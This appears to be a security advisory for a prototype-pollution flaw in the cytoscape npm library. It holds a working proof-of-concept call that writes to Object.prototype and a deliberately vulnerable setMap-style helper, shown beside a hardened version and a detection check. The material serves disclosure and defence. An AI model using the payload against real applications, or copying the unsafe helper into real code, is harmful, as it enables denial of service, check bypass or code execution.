cytoscape

vulnerability prototype pollution
severity 7.3
language javascript
registry npm

✍️ Description

Cytoscape.js contains a graph theory model and an optional renderer to display interactive graphs. This library was designed to make it as easy as possible for programmers and scientists to use graph theory in their apps, whether it's for server-side analysis in a Node.js app or for a rich user interface.

The setMap function is subject to prototype pollution because it recursively copies obj[key] into obj. This vulnerable API is exported and reachable by end users through the cytoscape constructor. The flaw allows modification of Object.prototype: if an attacker can control part of the structure passed to this function, they can add or modify an existing property, possibly leading to many kinds of attacks such as denial of service, check bypass, or potentially code execution.

🕵️‍♂️ Proof of Concept

// PoC.js
var cytoscape = require('cytoscape');
console.log('Before: ' + {}.polluted); // Before: undefined
// A string first argument routes the call through the extension registration path,
// where the key list ['__proto__', 'polluted'] is walked by setMap.
cytoscape('__proto__', 'polluted', 'HACKED');
console.log('After: ' + {}.polluted); // After: HACKED
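To show the defect and its fix side by side, here is an added example that is not cytoscape's own source: a simplified setMap-style helper in the vulnerable pattern the description refers to, next to a hardened variant that refuses prototype-reaching keys and only descends into own plain-object properties. The function names, the UNSAFE_KEYS set and the isPolluted check are assumptions for illustration.

```javascript
// Added illustration (not cytoscape's own code): a minimal setMap-style helper
// that walks a key path and writes a value. Names here are constructed.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern: each intermediate key is dereferenced on the target object,
// so a key of '__proto__' resolves to Object.prototype and the final write lands
// on the shared prototype instead of on the map.
function setMapUnsafe(map, keys, value) {
  let obj = map;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    obj = obj[key] = obj[key] || {};
  }
  obj[keys[keys.length - 1]] = value;
  return map;
}

// Hardened variant: reject keys that reach the prototype chain, and only descend
// into own, plain-object properties so an inherited value is never a write target.
function setMapSafe(map, keys, value) {
  for (const key of keys) {
    if (UNSAFE_KEYS.has(key)) {
      throw new TypeError(`refusing to set unsafe key "${key}"`);
    }
  }
  let obj = map;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    const own = Object.prototype.hasOwnProperty.call(obj, key) ? obj[key] : undefined;
    obj = obj[key] = (own !== null && typeof own === 'object') ? own : {};
  }
  obj[keys[keys.length - 1]] = value;
  return map;
}

// Detection helper: true when Object.prototype carries a property it never
// defined itself, which is the observable symptom of a successful pollution.
function isPolluted(prop) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, prop);
}
```

Running setMapUnsafe with a '__proto__' key path makes isPolluted report the injected property on every object in the process, while setMapSafe throws before any write happens.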

💥 Impact

This vulnerability is capable of polluting Object's prototype and possibly leading to many kinds of attacks such as denial of service, check bypass, or potentially code execution.

References